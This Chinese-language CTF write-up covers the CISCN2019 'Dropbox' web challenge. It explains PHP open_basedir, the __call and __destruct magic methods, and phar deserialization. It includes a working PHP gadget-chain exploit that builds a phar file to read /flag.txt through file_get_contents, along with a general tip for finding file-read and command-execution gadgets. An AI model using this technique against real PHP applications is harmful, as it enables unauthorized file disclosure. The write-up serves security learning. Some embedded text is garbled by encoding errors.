[CISCN2019 华北赛区 Day1 Web1]Dropbox

知识点轰炸

1.1 open_basedir

在in_set这个函数中，可以设置php的一些配置，其中就包括open_basedir ，用来限制当前程序可以访问的目录。后来问了一下朱师傅，了解到：它是可以访问设置目录下的所有下级目录。
若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录，请用斜线结束路径名。”."可代表当前目录，open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。例：
ini_set(“open_basedir”, getcwd() . “:/etc:/tmp”); 就是只可以访问当前目录(getcwd()返回当前目录)、/etc和/tmp三个目录。解释了为什么要在delete.php中利用payload，而不是download.php。

1.2 chdir() mkdir()

• chdir() 现实目录跳跃，解释了为什么下载时要filename = ../../indx.php ，而不是filename = index.php。
• mkdir() 创建一个文件夹，顺带提一下。

1.3 function __all($func, $args)

php的魔术方法，为什么要叫魔术方法？__call($func,$args)会在对象调用的方法不存在时，自动执行。 $func:被调用的方法名，所以$func()在这个魔术方法中，可以表示被调用的那个方法； $args : 被调用方法中的参数（这是个数组）

public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

在本题中，次方法的作用，是去调用对象没有的方法。首先把要调用的方法，压进$this->funcs中，然后遍历每一个文件，让每一个文件，都去调用刚才的方法。比如在index.php中，就出现了这个函数的调用。

当执行 $a = new FileList($_SESSION[‘sandbox’])时，会先调用构造函数，把“$_SESSION[‘sandbox’]”目录下的所有文件，都放到 $a->files中，注意这是个数组，解释了为什么，在后面构造payload时，\$this->files要等于一个数组。然后 $a->Name(); 调用了一个FileList中并没有的方法，就会自动调用 __all($func, $args)函数，其中$func=Name。然后让
$a->files里的所有文件，都去调用这个方法。并把结果，存储在以filename为一级键名，方法为二级键名的数组中。然后Size方法同样如此。

	name	Size
filename1	xx	xx
filename2	xx	xx

也就时说，它在程序中的作用就是，遍历我们上传的所有文件，并把它们的信息，储存在\$a->result这个二维数组中。

1.4 function __destruct()

foreach ($this->results as $filename => $result) {
            $table .= '';
            foreach ($result as $func => $value) {
                $table .= '' . htmlentities($value) . '';
            }
            $table .= '. htmlentities($filename) . '">涓嬭浇 / 鍒犻櫎';
            $table .= '';
        }

• foreach ($this->results as $filename => $result) 每次把每个一级数组的值，传递给$result,即filename1[]

• foreach ($result as $func => $value) 每次把每个二级数组的值，传递给$value

• echo table 最后打印出来全部数据

解决了读取的数据，无法输出的问题

1.5 phar（重点）

讲phar的链接
我的理解，我们可以把一个序列化的对象，储存在phar格式的文件中，生成后（一定要是生成后），即使我们把格式给改了，也不影响它的作用：用一些文件包含函数，如果我们以phar://协议去访问这个文件，那么就可以把那个对象给反序列化。
php一大部分的文件系统函数在通过phar://伪协议解析phar文件时，都会将meta-data进行反序列化，别人测试后，受影响的函数如下：

2 实践

在File类中，close方法存在file_get_contents()函数，在User中，会调用改方法$this->db->close()，如果有回显的化，我们就可以直接构造payload：

class User {
	public $db;
}
class File {
	public $filename = "/flag.txt";
}
$a = new User();
$a->db = new File();
?>

然后放到phar文件后，就可以了。
但事实并没有回显，那么我们就让$this->db = new FileList()，让它去调用close，然后调用__call(),然后再调用 __destruct()函数，打印结果。完美，可是我想不到
payload：

class User {
    public $db;
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file->filename = "/flag.txt";
        $this->files = array($file);
    }
}

$a = new User();
$a->db = new FileList();

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub(""); //设置stub

$o = new User();
$o->db = new FileList();

$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

3.总结

感觉只要和序列化有关的，就在魔术方法里，找高危函数就完事了，有file_get_contents()的，就是任意文件读取，有eval的，就是任意命令执行。